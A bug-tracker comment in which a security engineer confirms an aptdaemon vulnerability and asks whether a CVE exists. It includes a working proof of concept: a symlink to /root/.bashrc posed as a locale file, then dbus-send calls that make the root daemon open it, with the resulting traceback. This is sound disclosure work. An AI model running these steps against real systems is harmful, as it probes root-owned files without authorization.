Comment 2 for bug 1888235

Alex Murray (alexmurray) wrote :

Yes I can confirm this is an issue and is quite similar to CVE-2015-1323 - like in https://bugs.launchpad.net/ubuntu/+source/aptdaemon/+bug/1449587 a simple bash example via dbus-send is enough to demonstrate this:

$ mkdir -p /tmp/a/LC_MESSAGES
$ ln -s /root/.bashrc /tmp/a/LC_MESSAGES/aptdaemon.mo
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt org.debian.apt.InstallFile \
    string:/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb \
    boolean:false
method return time=1595299798.945425 sender=:1.194 -> destination=:1.193 serial=7 reply_serial=2
   string "/org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156"
$ dbus-send --print-reply --system --dest=org.debian.apt /org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156 org.freedesktop.DBus.Properties.Set string:org.debian.apt.transaction string:Locale string:/tmp/a.
Error org.freedesktop.DBus.Python.OSError: Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/policykit1.py", line 152, in get_uid_from_dbus_name
    return_value(uid)
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 462, in return_value
    raise _DefGen_Return(val)
defer._DefGen_Return: 1000

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
StopIteration

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 1226, in _set_property
    self._set_locale(value)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 835, in _set_locale
    self._translation = gettext.translation("aptdaemon",
  File "/usr/lib/python3.8/gettext.py", line 613, in translation
    t = _translations.setdefault(key, class_(fp))
  File "/usr/lib/python3.8/gettext.py", line 261, in __init__
    self._parse(fp)
  File "/usr/lib/python3.8/gettext.py", line 393, in _parse
    raise OSError(0, 'Bad magic number', filename)
OSError: [Errno 0] Bad magic number: '/tmp/a/LC_MESSAGES/aptdaemon.mo'

Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?